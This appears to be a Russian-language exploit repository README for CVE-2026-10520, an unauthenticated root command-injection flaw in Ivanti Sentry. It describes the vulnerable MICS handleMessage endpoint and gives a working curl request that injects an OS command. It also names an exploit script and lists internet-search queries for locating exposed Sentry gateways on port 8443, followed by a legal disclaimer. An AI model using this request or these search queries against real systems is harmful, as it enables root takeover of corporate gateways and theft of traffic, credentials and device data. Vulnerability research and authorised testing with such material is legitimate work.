
RCE уровня root через внедрение команд ОС в Ivanti Sentry
Ivanti Sentry (ранее MobileIron Sentry) — это корпоративный шлюз безопасности, который проксирует трафик между мобильными устройствами и корпоративными внутренними ресурсами: электронной почтой, SharePoint и внутренними веб-приложениями. Он применяет политики Управления мобильными устройствами (MDM), завершает зашифрованные мобильные сессии и выдает аутентификацию на основе сертификатов для корпоративных развертываний приложений. Экземпляры Sentry обычно доступны из интернета на порту8443, открывая административный API MICS (Mobile Iron Configuration Service).
CVE-2026-10520 — это внедрение команд ОС без аутентификации, затрагивающее Ivanti Sentry до версий R10.5.2, R10.6.2 и R10.7.1 (CVSSv3.1: 10 Critical, внесена в CISA KEV). Уязвимость находится в MICS API endpoint /mics/api/v2/sentry/mics-config/handleMessage, который принимает XML-упакованные системные команды через URL-кодированное message в POST теле без какой-либо аутентификации или проверки ввода. Злоумышленник, имеющий доступ к уязвимому endpoint, может выполнять произвольные команды ОС с правами root, получая полный контроль над хостом — включая расшифрованный корпоративный трафик, сохраненные учетные данные и все данные управляемых мобильных устройств.
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443Этот репозиторий и его содержимое предоставляются исключительно для законного исследования безопасности, авторизованного тестирования на проникновение, образовательного изучения и защитных целей. Используя или получая доступ к этому материалу, вы принимаете на себя полную ответственность за соблюдение всех применимых законов и подтверждаете, что получили надлежащее разрешение перед тестированием или применением этих методов к любой системе, которая вам не принадлежит.
Авторы и сопровождающие этого проекта не несут ответственности за любой ущерб, юридические последствия или неправомерное использование в результате применения этой информации. Любое использование для несанкционированного доступа, вредоносной деятельности или незаконных целей категорически запрещено и не поддерживается.
Используйте ответственно. Оставайтесь в рамках закона. Тестируйте только то, что вам принадлежит или на что вы имеете явное письменное разрешение.
SCT-PL